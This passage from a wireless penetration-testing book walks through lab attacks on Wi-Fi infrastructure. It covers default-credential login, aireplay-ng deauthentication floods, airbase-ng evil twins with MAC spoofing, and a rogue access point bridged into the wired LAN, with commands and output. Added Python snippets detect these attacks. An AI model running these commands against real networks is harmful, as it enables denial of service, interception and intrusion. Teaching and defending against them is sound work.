1. In the case of WPA, the matter is a bit more complicated. The iwconfig utility cannot be used with WPA/WPA2 Personal and Enterprise, as it does not support them. We will use a new tool called WPA supplicant for this lab. To use WPA supplicant for a network, we will need to create a configuration file as shown in the screenshot. We will name this file wpa-supp.conf:

# WPA-PSK/TKIP
network={
    ssid="Wireless Lab"
    key_mgmt=WPA-PSK
    proto=WPA
    pairwise=TKIP
    group=TKIP
    psk="abcdefgh"
}
2. We will then invoke the WPA supplicant utility with the options -Dwext -iwlan0 -c wpa-supp.conf to connect to the WPA network we just cracked, as shown. Once the connection is successful, WPA supplicant will give you the message Connection to XXXX completed:

root@bt: ~ - Shell No. 2 - Konsole
root@bt:~# wpa_supplicant -Dwext -iwlan0 -c wpa-supp.conf
CTRL-EVENT-SCAN-RESULTS
Trying to associate with 00:21:91:d2:8e:25 (SSID='Wireless Lab' freq=2412 MHz)
Associated with 00:21:91:d2:8e:25
WPA: Key negotiation completed with 00:21:91:d2:8e:25 [PTK=TKIP GTK=TKIP]
CTRL-EVENT-CONNECTED - Connection to 00:21:91:d2:8e:25 completed (auth) [id=0 id_str=]
3. For both the WEP and WPA networks, once you are connected, you want to use dhclient3 to grab a DHCP address from the network as shown next:

root@bt: ~ - Shell No. 3 - Konsole
root@bt:~# dhclient3 wlan0
There is already a pid file /var/run/dhclient.pid with pid 5308
killed old client process, removed PID file
Internet Systems Consortium DHCP Client V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/

mon0: unknown hardware address type 803
mon0: unknown hardware address type 803
Listening on LPF/wlan0/00:c0:ca:3e:bd:93
Sending on   LPF/wlan0/00:c0:ca:3e:bd:93
Sending on   Socket/fallback
DHCPREQUEST of 192.168.0.198 on wlan0 to 255.255.255.255 port 67
DHCPACK of 192.168.0.198 from 192.168.0.1
bound to 192.168.0.198 -- renewal in 37236 seconds.
root@bt:~#
root@bt:~# ping 192.168.0.1
PING 192.168.0.1 (192.168.0.1) 56(84) bytes of data.
64 bytes from 192.168.0.1: icmp_seq=1 ttl=64 time=32.2 ms
64 bytes from 192.168.0.1: icmp_seq=2 ttl=64 time=7.89 ms
64 bytes from 192.168.0.1: icmp_seq=3 ttl=64 time=9.74 ms
^C
--- 192.168.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2005ms
rtt min/avg/max/mdev = 7.893/16.623/32.230/11.062 ms
root@bt:~#

The default Wi-Fi utility iwconfig cannot be used to connect to WPA/WPA2 networks. The de-facto tool for this is WPA Supplicant. In this lab, we saw how we can use it to connect to a WPA network.


Pop quiz - WLAN encryption flaws

1. What packets are used for Packet Replay?
   a. De-authentication packet
   b. Associated packet
   c. Encrypted ARP packet
   d. None of the above

2. WEP can be cracked:
   a. Always
   b. Only when a weak key/passphrase is chosen
   c. Under special circumstances only
   d. Only if the access point runs old software

3. WPA can be cracked:
   a. Always
   b. Only if a weak key/passphrase is chosen
   c. If the client contains old firmware
   d. Even with no client connected to the wireless network


In this chapter, we have learnt the following about WLAN encryption:

* WEP is flawed and, no matter what the WEP key is, with enough data packet samples it is always possible to crack WEP.
* WPA/WPA2 is cryptographically un-crackable currently; however, under special circumstances, such as when a weak passphrase is chosen in WPA/WPA2-PSK, it is possible to retrieve the passphrase using dictionary attacks.

In the next chapter, we will look at different attacks on the WLAN infrastructure, such as rogue access points, evil twins, bit flipping attacks, and so on.


Chapter 5
Attacks on the WLAN Infrastructure

"Thus, what is of supreme importance in war is to attack the enemy's strategy"
Sun Tzu, Art of War

In this chapter, we will attack the WLAN infrastructure's core! We will focus on how we can penetrate into the authorized network by using various new attack vectors and also how we can lure authorized clients to connect to us, as an attacker.

The WLAN infrastructure is what provides wireless services to all the WLAN clients in a system. In this chapter, we will look at various attacks which can be conducted against the infrastructure:

* Default accounts and credentials on the access point
* Denial of service attacks
* Evil twin and access point MAC spoofing
* Rogue access points


WLAN access points are the core building blocks of the infrastructure. Even though they play such an important role, they are sometimes the most neglected in terms of security. In this exercise, we will check whether the default passwords have been changed on the access point or not. Then we will go on to verify that, even if the passwords have been changed, they are still easy to guess and crack using a dictionary-based attack.

It is important to note that as we move on into more advanced chapters, it will be assumed that you have gone through the previous chapters and are now familiar with the use of all the tools discussed there. This will allow us to build on that knowledge and try more complicated attacks!

Time for action — cracking default accounts on the access point

Follow these instructions to get started:





1. Let us first connect to our access point Wireless Lab. We see that the access point model is D-Link DIR-615, as shown in the following screenshot:

[Screenshot: the router's login page. Product Page: DIR-615, Hardware Version: B2, Firmware Version: 2.23. "Log in to the router:" with User Name: Admin and an empty Password field. Copyright 2004-2007 D-Link Systems, Inc.]

2. From the manufacturer's website, we find that the default account credentials for Admin are blank, that is, no password. We try this on the login page and succeed in logging in. This shows how easy it is to break into accounts with default credentials. We would highly encourage you to obtain the router's user manual online. This will allow you to understand what you are dealing with during the penetration test and give you an insight into other configuration flaws you could check for.

[Screenshot: the DIR-615 administration interface after logging in (SETUP, ADVANCED, TOOLS, STATUS and SUPPORT tabs), showing the Internet Connection Setup Wizard and the Manual Internet Connection Options, with the Helpful Hints panel on the right.]
We verified that default credentials are sometimes never changed on the access point, and this could lead to a full system compromise. Also, even if the default credentials are changed, they should not be something which is easy to guess or to recover with a simple dictionary-based attack.





Have a go hero — cracking accounts using bruteforce attacks

In the previous exercise, change the password to something hard to guess or find in a dictionary and see if you can crack it using a brute-force approach. Limit the length and characters in the password, so that you can succeed at some point. One of the most common tools used to crack HTTP authentication is called Hydra, available on BackTrack.

WLANs are prone to Denial of Service (DoS) attacks using various techniques, including but not limited to:

* De-Authentication attack
* Dis-Association attack
* CTS-RTS attack
* Signal interference or spectrum jamming attack

In the scope of this book, we will discuss De-Authentication attacks on the Wireless LAN infrastructure using the following experiment:


Time for action — De-Authentication DoS attack 


Follow these instructions to get started: 





1. Let us configure our Wireless Lab network to use Open Authentication and no encryption. This will allow us to see the packets using Wireshark easily:

[Screenshot: DIR-615 Wireless Settings page. Wireless Network Name: Wireless Lab (Also called the SSID); 802.11 Mode: Mixed 802.11n, 802.11g and 802.11b; Wireless Channel: 2.462 GHz - CH 11; Transmission Rate: Best (automatic); Channel Width: 20 MHz; Visibility Status: Visible; Wireless Security Mode, Security Mode: None.]
2. Let us connect a Windows client to the access point. We will see the connection in the airodump-ng screen:

root@bt: ~ - Shell - Konsole
CH 11 ][ Elapsed: 20 s ][ 2011-03-05 06:50
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
00:21:91:D2:8E:25   -9 100      203        4    0  11  54 . OPN              Wireless Lab
BSSID              STATION            PWR   Rate    Lost  Packets  Probes
00:21:91:D2:8E:25  60:FB:42:D5:E4:01  -35   0 -36e   251        8




3. Now, on the attacker machine, let us run a directed De-Authentication attack against this:

root@bt: ~ - Shell - Konsole <2>
root@bt:~# aireplay-ng --deauth 1 -a 00:21:91:D2:8E:25 -h 00:21:91:D2:8E:25 -c 60:FB:42:D5:E4:01 mon0
The interface MAC (00:C0:CA:3E:BD:93) doesn't match the specified MAC (-h).
        ifconfig mon0 hw ether 00:21:91:D2:8E:25
06:57:59  Waiting for beacon frame (BSSID: 00:21:91:D2:8E:25) on channel 11
06:58:00  Sending 64 directed DeAuth. STMAC: [60:FB:42:D5:E4:01] [ 2|63 ACKs]




4. Note how the client gets disconnected from the access point completely. We can verify the same on the airodump-ng screen as well:

root@bt: ~ - Shell - Konsole
CH 11 ][ Elapsed: 32 s ][ 2011-03-05 07:00
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
00:21:91:D2:8E:25   -6  73      315        0    0  11  54e. OPN              Wireless Lab
BSSID              STATION            PWR   Rate    Lost  Packets  Probes
5. If we use Wireshark to see the traffic, you will notice a lot of De-Authentication packets over the air which we just sent:

[Screenshot: Wireshark packet list around frames 552 to 572, a run of IEEE 802.11 Deauthentication frames (SN=106 through SN=114, FN=0) between D-Link_d2:8e:25 and 60:fb:42:d5:e4:01 in both directions, interleaved with IEEE 802.11 Acknowledgement frames. The selected frame 554 is 39 bytes on the wire and 39 bytes captured: a Radiotap header (v0, length 13) followed by the IEEE 802.11 Deauthentication management frame. Status bar: Packets: 905 Displayed: 905 Marked: 0 Dropped: 0.]

6. We can do the same attack by sending a Broadcast De-Authentication packet on
behalf of the access point to the entire wireless network. This will have the effect of
disconnecting all connected clients:


root@bt:~# aireplay-ng --deauth 0 -a 00:21:91:D2:8E:25 -h 00:21:91:D2:8E:25 mon0
The interface MAC (00:C0:CA:3E:BD:93) doesn't match the specified MAC (-h).
        ifconfig mon0 hw ether 00:21:91:D2:8E:25
07:03:54  Waiting for beacon frame (BSSID: 00:21:91:D2:8E:25) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
07:03:..  Sending DeAuth to broadcast -- BSSID: [00:21:91:D2:8E:25]
(the "Sending DeAuth to broadcast" line repeats for every burst sent)

We successfully sent De-Authentication frames to both the access point and the client. This
resulted in the two being disconnected and a full loss of communication between them.

We also sent out Broadcast De-Authentication packets, which ensure that no client
in the vicinity can successfully connect to our access point.

It is important to note that as soon as the client is disconnected it will try to connect back
once again to the access point, and thus the De-Authentication attack has to be carried out
in a sustained way to have a full Denial of Service effect.

This is one of the easiest attacks to orchestrate but has the most devastating effect. It
could easily be used in the real world to bring a wireless network to its knees.
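From the defender's side, the flood above is easy to see in a capture. The following is an added example, not code from the book: it parses constructed tshark-style summary lines (the addresses are the lab's, the timings and sequence numbers are made up) and flags a source that sends many De-Authentication frames in a short window, as well as any broadcast De-Authentication. The one-second window and the threshold of five frames are arbitrary choices.

```python
import re
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed capture summary (tshark-like): "<time> <src> -> <dst> <subtype>[, SN=<n>]".
# The burst mirrors the Wireshark screen in the text; the last line is a single, ordinary
# deauth from another access point that should not raise an alert.
SAMPLE_CAPTURE = """\
10.443725 00:21:91:d2:8e:25 -> 60:fb:42:d5:e4:01 Deauthentication, SN=106
10.446512 00:21:91:d2:8e:25 -> 60:fb:42:d5:e4:01 Deauthentication, SN=107
10.448080 00:21:91:d2:8e:25 -> 60:fb:42:d5:e4:01 Deauthentication, SN=108
10.450161 60:fb:42:d5:e4:01 -> 00:21:91:d2:8e:25 Acknowledgement
10.452815 00:21:91:d2:8e:25 -> 60:fb:42:d5:e4:01 Deauthentication, SN=109
10.455697 00:21:91:d2:8e:25 -> 60:fb:42:d5:e4:01 Deauthentication, SN=110
10.457106 00:21:91:d2:8e:25 -> 60:fb:42:d5:e4:01 Deauthentication, SN=111
10.459655 00:21:91:d2:8e:25 -> 60:fb:42:d5:e4:01 Deauthentication, SN=112
10.464796 00:21:91:d2:8e:25 -> 60:fb:42:d5:e4:01 Deauthentication, SN=113
25.100000 00:21:91:d2:8e:25 -> ff:ff:ff:ff:ff:ff Deauthentication, SN=200
25.100500 00:21:91:d2:8e:25 -> ff:ff:ff:ff:ff:ff Deauthentication, SN=201
90.000000 00:1e:40:53:02:fc -> c8:bc:c8:ee:12:34 Deauthentication, SN=3001
"""

LINE_RE = re.compile(
    r"^(?P<time>\d+\.\d+)\s+(?P<src>[0-9a-f:]{17})\s+->\s+(?P<dst>[0-9a-f:]{17})\s+"
    r"(?P<subtype>[A-Za-z ]+?)(?:,\s*SN=(?P<sn>\d+))?\s*$"
)


def parse_summary(lines):
    """Yield (time, src, dst, subtype) for lines that match; anything else is skipped."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            yield float(m["time"]), m["src"].lower(), m["dst"].lower(), m["subtype"]


def max_in_window(times, window_s):
    """Largest number of events inside any window of window_s seconds (two-pointer scan)."""
    times = sorted(times)
    best, start, lo = 0, 0.0, 0
    for hi, t in enumerate(times):
        while t - times[lo] > window_s:
            lo += 1
        if hi - lo + 1 > best:
            best, start = hi - lo + 1, times[lo]
    return best, start


def analyze_deauth(lines, window_s=1.0, threshold=5):
    """Return alert dicts for sources that flood deauths or send broadcast deauths.

    A genuine access point does send the odd Deauthentication frame (idle timeout and
    the like), so a single frame is not an alert; a burst within the window is."""
    deauths = defaultdict(list)    # src -> timestamps of its Deauthentication frames
    broadcast = defaultdict(int)   # src -> number of Deauthentication frames sent to broadcast
    for t, src, dst, subtype in parse_summary(lines):
        if subtype != "Deauthentication":
            continue
        deauths[src].append(t)
        if dst == BROADCAST:
            broadcast[src] += 1

    alerts = []
    for src, times in deauths.items():
        count, start = max_in_window(times, window_s)
        if count >= threshold:
            alerts.append({"type": "deauth_flood", "src": src,
                           "count": count, "window_start": start})
    for src, n in broadcast.items():
        alerts.append({"type": "broadcast_deauth", "src": src, "count": n})
    return alerts


if __name__ == "__main__":
    for alert in analyze_deauth(SAMPLE_CAPTURE.splitlines()):
        print(alert)
```

Where the hardware supports 802.11w management frame protection, enabling it makes spoofed frames like these fail the client's integrity check instead of disconnecting it.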





Try and check how you can conduct Dis-Association attacks against the infrastructure using 
tools available on BackTrack. Can you do a broadcast Dis-Association attack? 


One of the most potent attacks on WLAN infrastructures is the Evil Twin. The idea is to 
basically introduce an attacker-controlled access point in the vicinity of the WLAN network. 
This access point will advertise the exact same SSID as the authorized WLAN network. 


Many wireless users may accidentally connect to this malicious access point thinking it is part
of the authorized network. Once a connection is established, the attacker can orchestrate a
man-in-the-middle attack and transparently relay traffic while eavesdropping on the entire
communication. We will look at how a man-in-the-middle attack is done in a later chapter. In
the real world, an attacker would ideally use this attack close to the authorized network, so
that the user gets confused and accidentally connects to his network.


An evil twin having the same MAC address as an authorized access point is even more 
difficult to detect and deter. This is where access point MAC spoofing comes in! In the 
next experiment, we will look at how to create an evil twin, coupled with access point 
MAC spoofing. 
Time for action — evil twin with MAC spoofing


Follow these instructions to get started: 


1. Use airodump-ng to locate the BSSID and ESSID of the access point which we would like
to emulate in the evil twin:


CH 2 ][ Elapsed: 0 s ][ 2011-03-05 08:31

BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
00:1E:40:53:02:FC  -46        2      0    0  11  54   WPA  TKIP   PSK  vivek
00:21:91:D2:8E:25  -33        4      0    0  11  54 . OPN              Wireless Lab

BSSID              STATION            Rate  Lost  Packets  Probes


CH 11 ][ Elapsed: 0 s ][ 2011-03-05 08:33

BSSID              PWR RXQ  Beacons  ENC   CIPHER AUTH ESSID
00:22:7F:65:0A:99  -67                WPA2  CCMP   MGT  <length: 0>
00:17:7C:09:CF:10  -70                WPA   TKIP   PSK  Sunny
00:1E:40:53:02:FC  -40                WPA   TKIP   PSK  vivek
00:21:91:D2:8E:25  -18              . OPN              Wireless Lab

BSSID              STATION            PWR   Rate   Lost  Packets  Probes
00:21:91:D2:8E:25  60:FB:42:D5:E4:01  -20   0 -36e  575       11  Vivek


3. Using this information, we create a new access point with the same ESSID but a
different BSSID and MAC address using the airbase-ng command:


root@bt:~# airbase-ng -a AA:AA:AA:AA:AA:AA --essid "Wireless Lab" -c 11 mon0
08:36:20  Created tap interface at0
08:36:20  Trying to set MTU on at0 to 1500
08:36:20  Access Point with BSSID AA:AA:AA:AA:AA:AA started.

4. This new access point also shows up in the airodump-ng screen. It is important to
note that you will need to run airodump-ng in a new window with the command
airodump-ng --channel 11 wlan0 to see this new access point:


[airodump-ng screen, 2011-03-05 08:39: two access points now advertise the ESSID
"Wireless Lab" (the original 00:21:91:D2:8E:25 and the evil twin AA:AA:AA:AA:AA:AA,
both OPN), alongside Sunny and vivek (both WPA TKIP PSK). The client
60:FB:42:D5:E4:01 is still associated to 00:21:91:D2:8E:25 (PWR -21, Rate 0 -36e,
Lost 159, Packets 2).]

5. Now we send a De-Authentication frame to the client, so it disconnects and 
immediately tries to re-connect: 


root@bt:~# aireplay-ng --deauth 0 -a 00:21:91:D2:8E:25 mon0
08:41:02  Waiting for beacon frame (BSSID: 00:21:91:D2:8E:25) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
08:41:..  Sending DeAuth to broadcast -- BSSID: [00:21:91:D2:8E:25]
(the "Sending DeAuth to broadcast" line repeats for every burst sent)

6. As we are closer to this client, our signal strength is higher and it connects to our Evil
Twin access point as shown in the following screens:


[airodump-ng screen, 2011-03-05 08:43: the client 60:FB:42:D5:E4:01 now shows 112
packets against the "Wireless Lab" evil twin; Sunny, vivek, the hidden <length: 0>
network and the original Wireless Lab are listed as before.]

root@bt:~# airbase-ng -a AA:AA:AA:AA:AA:AA --essid "Wireless Lab" -c 11 mon0
Created tap interface at0
Trying to set MTU on at0 to 1500
Access Point with BSSID AA:AA:AA:AA:AA:AA started.
Client 60:FB:42:D5:E4:01 associated (unencrypted) to ESSID: "Wireless Lab"
(the "Client ... associated" line repeats as the client re-associates)


7. We can also spoof the BSSID and MAC address of the access point using the following
command:

root@bt:~# airbase-ng -a 00:21:91:D2:8E:25 --essid "Wireless Lab" -c 11 mon0
Created tap interface at0
Trying to set MTU on at0 to 1500
Access Point with BSSID 00:21:91:D2:8E:25 started.
Client 60:FB:42:D5:E4:01 associated (unencrypted) to ESSID: "Wireless Lab"
8. Now if we look through airodump-ng, it is almost impossible to differentiate
between the two visually:


CH 11 ][ Elapsed: 0 s ][ 2011-03-05 08:47

BSSID              PWR  Beacons  #Data   CH  ENC  CIPHER AUTH ESSID
00:22:7F:65:0A:99   -1        0      0  158  WPA              <length: 0>
00:1E:40:53:02:FC  -40       10      0   11  WPA  TKIP   PSK  vivek
00:17:7C:09:CF:10  -72        8      0   11  WPA  TKIP   PSK  Sunny
00:21:91:D2:8E:25   -1       30      0   11  OPN              Wireless Lab

BSSID              STATION            PWR  Rate  Lost  Packets  Probes
00:21:91:D2:8E:25  60:FB:42:D5:E4:01  -14     0     1           Wireless






9. Even airodump-ng is unable to tell that there are actually two different
physical access points on the same channel. This is the most potent form of the
evil twin.


What just happened?

We created an Evil Twin for the authorized network and used a De-Authentication
attack to have the legitimate client connect back to us, instead of the authorized network
access point.





It is important to note that in the case of the authorized access point using encryption such 
as WEP/WPA, it might be more difficult to conduct an attack in which traffic eavesdropping 
may be possible. We will look at how to break the WEP key with just a client using the Caffe 
Latte attack in a later chapter. 


In the previous exercise, run the evil twin on different channels and observe how the client, 
once disconnected, would hop channels to connect to the access point. What is the deciding 
factor upon which the client decides which access point to connect to? Is it signal strength? 
Experiment and validate. 
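Two checks a wireless IDS can make against the evil twins built above, as an added example that is not from the book: the first flags a known ESSID advertised by a BSSID outside an authorized inventory (the step-3 twin), the second flags a BSSID whose beacon sequence numbers keep jumping, which is what two radios sharing one BSSID produce (the step-7 twin that airodump-ng could not tell apart). The inventory, the beacon observations and the thresholds are constructed; the addresses mirror the lab.

```python
from collections import defaultdict

SEQ_MOD = 4096  # 802.11 sequence numbers are 12 bits wide

# Authorized inventory: ESSID -> BSSIDs allowed to advertise it (constructed).
AUTHORIZED = {"Wireless Lab": {"00:21:91:d2:8e:25"}}

# Constructed beacon observations (bssid, essid, channel, sequence number) in capture order.
# Lines 1-5: the plain evil twin from step 3 (different BSSID, same ESSID).
# Lines 6-11: the step-7 twin, where the real radio's counter (around 3010) and the
# fake radio's counter (around 20) arrive interleaved under one BSSID.
SAMPLE_BEACONS = [
    ("00:21:91:d2:8e:25", "Wireless Lab", 11, 3001),
    ("aa:aa:aa:aa:aa:aa", "Wireless Lab", 11, 17),
    ("00:21:91:d2:8e:25", "Wireless Lab", 11, 3004),
    ("aa:aa:aa:aa:aa:aa", "Wireless Lab", 11, 18),
    ("00:1e:40:53:02:fc", "vivek", 11, 900),
    ("00:21:91:d2:8e:25", "Wireless Lab", 11, 3010),
    ("00:21:91:d2:8e:25", "Wireless Lab", 11, 21),
    ("00:21:91:d2:8e:25", "Wireless Lab", 11, 3013),
    ("00:21:91:d2:8e:25", "Wireless Lab", 11, 22),
    ("00:21:91:d2:8e:25", "Wireless Lab", 11, 3016),
    ("00:21:91:d2:8e:25", "Wireless Lab", 11, 23),
    ("00:1e:40:53:02:fc", "vivek", 11, 903),
]


def unauthorized_bssids(beacons, inventory):
    """ESSIDs from the inventory advertised by a BSSID that is not allowed to (step-3 twin)."""
    seen = defaultdict(set)
    for bssid, essid, _ch, _sn in beacons:
        seen[essid].add(bssid)
    return {essid: sorted(seen[essid] - allowed)
            for essid, allowed in inventory.items()
            if seen[essid] - allowed}


def sequence_anomalies(beacons, max_gap=256, min_hits=3):
    """BSSIDs whose beacon sequence numbers repeatedly jump (step-7 twin).

    One radio increments its counter for every frame it sends, so successive beacons
    from a genuine BSSID move forward by a small amount (mod 4096); a retransmission
    repeats the same number. Two radios sharing a BSSID produce two unrelated counters,
    so consecutive beacons jump back and forth by far more than max_gap. The sensor
    must stay on the channel: frames missed while hopping inflate the gaps too."""
    last = {}
    jumps = defaultdict(int)
    for bssid, _essid, _ch, sn in beacons:
        if bssid in last:
            delta = (sn - last[bssid]) % SEQ_MOD   # 0 for a retransmission, small when healthy
            if delta > max_gap:
                jumps[bssid] += 1
        last[bssid] = sn
    return {b: n for b, n in jumps.items() if n >= min_hits}


if __name__ == "__main__":
    print("unauthorized:", unauthorized_bssids(SAMPLE_BEACONS, AUTHORIZED))
    print("shared BSSID:", sequence_anomalies(SAMPLE_BEACONS))
```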


Rogue access point


A Rogue access point is an unauthorized access point connected to the authorized network. 
Typically, this access point can be used as a backdoor entry by an attacker, thus enabling him 
to bypass all security controls on the network. This would mean that the firewalls, intrusion 
prevention systems, and so on, which guard the border of a network would be able to do 
little to stop him from accessing the network. 


In the most common case, a Rogue access point is set to Open Authentication and no
encryption. A Rogue access point can be created in two ways:


1. Installing an actual physical device on the authorized network as a Rogue access
point. This is something I leave as an exercise for you. Also, more than
wireless security, this has to do with a breach of the physical security of the
authorized network.


2. Creating a Rogue access point in software and bridging it with the authorized
network's local Ethernet network. This will allow practically any laptop running on the
authorized network to function as a Rogue access point. We will look at this in the
next experiment.





Time for action — Rogue access point 


Follow these instructions to get started: 


1. Let us first bring up our Rogue access point using airbase-ng and give it the
ESSID Rogue:


root@bt:~# airbase-ng --essid Rogue -c 11 mon0
11:01:49  Created tap interface at0
11:01:49  Trying to set MTU on at0 to 1500
11:01:49  Access Point with BSSID 00:C0:CA:3E:BD:93 started.

Chapter 5 


2. We now want to create a bridge between the Ethernet interface, which is part of the
authorized network, and our Rogue access point interface. To do this we will first
create a bridge interface and name it Wifi-Bridge:


root@bt:~# brctl addbr Wifi-Bridge
root@bt:~#

3. We will then add both the Ethernet interface and the at0 virtual interface created by
airbase-ng to this bridge:


root@bt:~# brctl addif Wifi-Bridge eth0
root@bt:~# brctl addif Wifi-Bridge at0
root@bt:~#

4. We will then bring these interfaces up to bring the bridge up:


root@bt:~# ifconfig eth0 0.0.0.0 up
root@bt:~# ifconfig at0 0.0.0.0 up
root@bt:~#

5. We will then enable IP forwarding in the kernel to ensure packets are forwarded: 


root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:~#
6. Brilliant! We are done. Now any wireless client connecting to our Rogue access
point will have full access to the authorized network using the wireless-to-wired
"Wifi-Bridge" we just built. We can verify this by first connecting a client to the
Rogue access point. Once connected, if you are using Vista, your screen might look
like the following:


[Windows "Set Network Location" dialog: Successfully set network settings.
Network name: Rogue. Location type: Private (this allows you to see other computers
and devices, while making your computer discoverable).]






7. We will notice it receives an IP address from the DHCP daemon running on the
authorized LAN:


Wireless Network Connection Status - Network Connection Details:

Property                   Value
Connection-specific DN...
Description                Intel(R) WiFi Link 5100
Physical Address           00-22-FB-35-FC-44
DHCP Enabled               No
IPv4 IP Address            192.168.1.10
IPv4 Subnet Mask           255.255.255.0
IPv4 Default Gateway       192.168.1.1
IPv4 DNS Server            192.168.1.1
IPv4 WINS Server
NetBIOS over Tcpip En...   Yes
Link-local IPv6 Address    fe80::693d:fad9:1424:c019%11
IPv6 Default Gateway
IPv6 DNS Server

8. We can now access any host on the wired network from this wireless client using
this Rogue access point. Next, we are pinging the gateway on the wired network:


C:\> ping 192.168.1.1

Pinging 192.168.1.1 with 32 bytes of data:

Reply from 192.168.1.1: bytes=32 time=3ms TTL=64
Reply from 192.168.1.1: bytes=32 time=2ms TTL=64
Reply from 192.168.1.1: bytes=32 time=2ms TTL=64
Reply from 192.168.1.1: bytes=32 time=2ms TTL=64

Ping statistics for 192.168.1.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 2ms, Maximum = 3ms, Average = 2ms

We created a Rogue access point and used it to bridge all the authorized network LAN traffic
over the wireless network. As you can see, this is a really serious security threat, as anyone
can break into the wired network using this bridge.
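Detecting the bridge from the wired side, as an added example that is not from the book: once at0 is bridged to eth0, every wireless client's frames reach the switch with the client's own source MAC, so the port of the bridging laptop learns more addresses than a single end device should. The switch table rows, port names and every MAC except the client's 00-22-FB-35-FC-44 from the screenshot above are constructed; only rows in the style of a Cisco show mac address-table are parsed.

```python
import re
from collections import defaultdict

# One row of "show mac address-table": vlan, dotted MAC, type, port (constructed format).
MAC_ROW = re.compile(
    r"^\s*(?P<vlan>\d+)\s+(?P<mac>[0-9a-f]{4}\.[0-9a-f]{4}\.[0-9a-f]{4})\s+\S+\s+(?P<port>\S+)\s*$",
    re.IGNORECASE,
)

# Snapshot taken before the rogue went up: one MAC per access port, several on the uplink.
BASELINE = """\
Vlan    Mac Address       Type        Ports
----    -----------       --------    -----
   1    0011.2233.4455    DYNAMIC     Gi0/1
   1    0011.2233.4466    DYNAMIC     Gi0/2
   1    0011.2233.aa01    DYNAMIC     Gi0/24
   1    0011.2233.aa02    DYNAMIC     Gi0/24
"""

# Snapshot taken after the wireless client joined the Rogue ESSID: its MAC now sits behind
# Gi0/2, the port of the bridging laptop (whose eth0 MAC 0011.2233.4466 is a placeholder).
CURRENT = """\
Vlan    Mac Address       Type        Ports
----    -----------       --------    -----
   1    0011.2233.4455    DYNAMIC     Gi0/1
   1    0011.2233.4466    DYNAMIC     Gi0/2
   1    0022.fb35.fc44    DYNAMIC     Gi0/2
   1    0011.2233.aa01    DYNAMIC     Gi0/24
   1    0011.2233.aa02    DYNAMIC     Gi0/24
   1    0011.2233.aa03    DYNAMIC     Gi0/24
"""

UPLINKS = {"Gi0/24"}   # ports that legitimately carry many MACs (constructed)


def canonical(mac):
    """Turn Cisco 'aabb.ccdd.eeff' into 'aa:bb:cc:dd:ee:ff'."""
    digits = mac.replace(".", "").lower()
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def parse_mac_table(text):
    """port -> set of MAC addresses the switch learned on it."""
    table = defaultdict(set)
    for line in text.splitlines():
        m = MAC_ROW.match(line)
        if m:
            table[m["port"]].add(canonical(m["mac"]))
    return dict(table)


def crowded_access_ports(table, uplinks, expected=1):
    """Access ports that learned more MACs than one end device should present.

    This is the condition switch port security enforces with a maximum address count;
    a software bridge like Wifi-Bridge trips it as soon as one wireless client joins."""
    return {port: sorted(macs) for port, macs in table.items()
            if port not in uplinks and len(macs) > expected}


def new_macs(baseline, current):
    """MACs that appeared on each port since the previous snapshot."""
    result = {}
    for port, macs in current.items():
        added = macs - baseline.get(port, set())
        if added:
            result[port] = sorted(added)
    return result


if __name__ == "__main__":
    before, after = parse_mac_table(BASELINE), parse_mac_table(CURRENT)
    print("crowded access ports:", crowded_access_ports(after, UPLINKS))
    print("new MACs per port:", new_macs(before, after))
```

A port-level check like this catches the software bridge built above; the physical rogue device from case 1 still needs physical and wireless-side checks.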





Check if you can create a Rogue access point which uses WPA/WPA2-based encryption to 
look more legitimate on the wireless network. 


1. What encryption does a Rogue access point use in most cases?
a. None
b. WEP
c. WPA
d. WPA2
Attacks on the WLAN Infrastructure


2. In Evil Twin, having the same MAC address as the authorized access point:
a. Makes detecting the Evil Twin more difficult
b. Forces the client to connect to it
c. Increases the signal strength of the network
d. None of the above


3. DoS attacks:
a. Bring down the overall throughput of the network
b. Do not target the clients
c. Can only be done if we know the network WEP/WPA/WPA2 credentials
d. All of the above


4. Rogue access points:
a. Allow for a backdoor entry into the authorized network
b. Use WPA2 encryption only
c. Can be created as a software-based access point or can be an actual device
d. Both (a) and (c)


Summary


In this chapter, we have explored the following ways to compromise the security of the
Wireless LAN infrastructure:

- Compromising default accounts and credentials on access points
- Denial of service attacks
- Evil twins and MAC spoofing
- Rogue access points in the enterprise network


In the next chapter, we will look at different attacks on the Wireless LAN client. Interestingly, 
most administrators feel the client has no security problems to worry about. We will see how 
nothing could be farther away from the truth. 





Attacking the Client


"Security is just as strong as the weakest link."
Famous Quote in Information Security Domain


Most penetration testers seem to give all the attention to the WLAN
infrastructure and don't give the wireless client even a fraction of that.
However, it is interesting to note that a hacker can gain access to the
authorized network by compromising a wireless client as well.


In this chapter, we will shift our focus from the WLAN infrastructure to the wireless client.
The client can be either a connected or an isolated, un-associated client. We will look at various
attacks which can be used to target the client.


We will cover the following:

- Honeypot and Mis-Association attacks
- Caffe Latte attack
- De-Authentication and Dis-Association attacks
- Hirte attack
- AP-less WPA-Personal cracking


Honeypot and Mis-Association attacks 


Normally, when a wireless client such as a laptop is turned on, it will probe for the networks 
it has previously connected to. These networks are stored in a list called the Preferred 
Network List (PNL) on Windows-based systems. Also, along with this list, it will display any 
networks available in its range. 


A hacker may do either of two things: 


1. Silently monitor the probe and bring up a fake access point with the same ESSID the 
client is searching for. This will cause the client to connect to the hacker machine, 
thinking it is the legitimate network. 


2. He may create fake access points with the same ESSID as neighboring ones to
confuse the user into connecting to him. Such attacks are very easy to conduct in coffee
shops and airports where a user might be looking to connect to a Wi-Fi network.


These are called Honeypot attacks; they succeed because the client mis-associates to the
hacker's access point, thinking it is the legitimate one.


In the next exercise, we will do both these attacks in our lab. 


Time for action — orchestrating a Mis-Association attack 


Follow these instructions to get started: 





